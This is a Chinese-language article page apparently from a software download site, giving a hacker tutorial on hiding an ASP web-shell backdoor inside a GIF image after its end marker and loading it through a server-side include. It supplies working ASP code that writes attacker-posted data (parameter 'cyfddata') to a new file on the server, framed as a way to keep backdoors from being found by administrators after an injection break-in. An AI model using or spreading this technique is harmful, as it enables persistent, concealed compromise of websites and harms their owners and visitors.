[
会员中心
] [
发布文章
][
发布软件
] [
中文繁體
]
文章
·
资料
电脑软件
手机软件
网站源码
电脑·手机·网络
学习
话题
娱乐
故事
文化·历史
国学典籍
法律法规
操作系统
网络
办公·文件
音频视频
图形图像
硬件·驱动程序
行业
教学学习
编程
游戏
安卓
苹果
鸿蒙
其他
ASP
ASP.NET
JSP
PHP
HTML
·
CSS
·
JavaScript
本 站 搜 索
文章
软件
[选项]
文章类别:
[全部]
电脑·手机·网络
话题
故事
文化·历史
娱乐
学习
法律·法规
国学典籍
搜索选项:
文章编号
文章标题
文章作者
文章来源
相关链接
关键字词
文章标签
文章内容
软件类别:
[全部]
操作系统
网络
办公·文件
音频视频
图形图像
行业
编程
教学学习
游戏
硬件·驱动程序
安卓系统
苹果系统
鸿蒙系统
其他系统
HTML·CSS·JavaScript
ASP
JSP
PHP
ASP.NET
搜索选项:
软件编号
软件名称
软件作者
软件来源
相关链接
关键字词
软件标签
软件简介
发 送 文 章
把脚本程序插入图片中
〖
评论()
〗〖
留言
〗〖
收藏
〗
收信地址
填写收信人的电子邮箱
邮件主题
填写邮件主题
邮件内容
现在从注入拿WEBSHELL看来成功率都比较高了。 拿到SHELL后,安装自己的脚本后门,常常被查杀。 脚本后门的发展史: 1。最开始就是直接放一个ASP文件上去。 2。把ASP文件加密才放上去。 3。把脚本插入到代码中去。(我经常用这种) 不过一样被查得出来,我前段时候手工检测一个站的脚本安全。 发现这个站被种了21个木马。 所以我就想到了,怎么样才能不被发现不能被查杀。 最后我研究了一下如果把脚本插入到图片中。 然后在ASP中调用图片中的脚本程序应该就可以了。 测试的时候通过了。 现在我把我的心德写一下。 让大家来分析一下。共同进步和完善这种方法。 在研究过程中我看了GIF图片的结构文档方面的书。 GIF图片都是以003B为结束的。 换句话说003B后面的不会显示出来。 所以我们在003B后面插入代码就行了。 当然代码我们加密放到图片中去效果更好。 我写了一个程序来这么做。 这里要说一下,在图片中003B后面的是不会显示出来的。 但其中的代码已经运行了。图片也会正常显示出来。 测试: 在图片后面加入:%=now% 然后在一个ASP文件中加入:!--includefile=aaa.gif-- 然后你们下载这个图片,发现图片最后面变成了时间。很正常因为图片放到了ASP脚本中运行了其中的代码。 换句话来说,如果写的是一段生成文件的脚本。 那么我们提交特定的参数让图片中的代码去生成文件。 这样就实现了我们的后门。 1:这种方法要做的工作就是在目标站点中找一张GIF图片然后把代码插入到图片中,再上传到站点中去。这样作管理员很难找到木马在哪里。打死也想不到木马在图片中。 2:我们插入的代码只有一行就是那个includefile..... 找个文件大点的ASP文件给插进去就行了。 然后我们在本地POST数据提交给ASP引用图片的URL这样就完成了工作。 我的插入图片的脚本: %dimobjFSO% %dimfdata% %dimobjCountFile% %onerrorresumenext% %SetobjFSO=Server.CreateObject(Scripting.FileSystemObject)% %fdata=request(cyfddata)% %iffdatathen% %syfdpath=server.mappath(Request.ServerVariables(SCRIPT_NAME))\ok.asp% %SetobjCountFile=objFSO.CreateTextFile(syfdapth,True)% %objCountFile.Writefdata% %endif% %objCountFile.Close% %SetobjCountFile=Nothing% %SetobjFSO=Nothing% 这段代码主要就是在当前目录下生成一个ok.asp文件。 文件内容是由我们提交的数据.用request(cyfddata)来获取的。 这段代码加密后插入到图片中去。 下面我把我程序的代码贴出来。(倒程序代码没有打包在里面。明天再贴上来) 现在给程序地址下载: 点这里下载测试程序。 本地自己构建一个提交表单向ASP文件提交(加入图片那个文件) 表单文本框输入内容名称是:cyfddata 后感: 我本人认为这种方法,管理员很难查到。这是我两天前想到的作出来了, 可能有些问题希望和大家一起讨论,必竞,为了追求技术就得研究技术。 共享知识,从而升华。 感觉去研究一些新东西,人活得更XS些。<br /><br />文章网址:<a href="https://dangbai.cn/Article.asp?ID=10000880" target="_blank">https://dangbai.cn/Article.asp?ID=10000880</a>
填写邮件内容
发信地址
填写发信人的电子邮箱
邮件签名
填写邮件签名
验证码
填写验证码,单击刷新验证码
程序执行中,请稍候...
发送协议
·欢迎使用本站在线文章发送系统。
·不得使用本站在线发送邮件系统发送垃圾邮件、广告邮件。
·如果收信人地址或其服务器出现错误,可能无法成功发送。
·如果有什么问题,或者意见建议,请联系[
网站管理员
]。
当百网
本站使用【啊估文章软件站】网站系统
〖
网站管理员留言簿
〗
本 站 搜 索
发 送 文 章
程序执行中,请稍候...
